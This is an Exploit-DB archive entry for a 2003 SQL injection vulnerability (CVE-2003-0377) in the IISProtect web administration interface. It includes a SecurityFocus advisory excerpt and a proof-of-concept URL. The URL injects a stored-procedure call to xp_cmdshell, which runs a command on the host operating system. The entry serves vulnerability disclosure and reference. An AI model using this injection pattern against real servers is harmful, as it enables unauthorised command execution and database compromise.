IISProtect 2.1/2.2 Web Administration Interface SQL Injection Vulnerability

2003-05-23T00:00:00
ID EDB-ID:22639
Type exploitdb
Reporter Gyrniff
Modified 2003-05-23T00:00:00

Description

IISProtect 2.1/2.2 Web Administration Interface SQL Injection Vulnerability. CVE-2003-0377. Webapps exploit for asp platform

                                        
                                            source: http://www.securityfocus.com/bid/7675/info

The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect.

Successful exploitation could result in a compromise of the IISProtect server, attacks on the database or other consequences. 

http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste
r..xp_cmdshell'ping%2010.10.10.11';--

This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.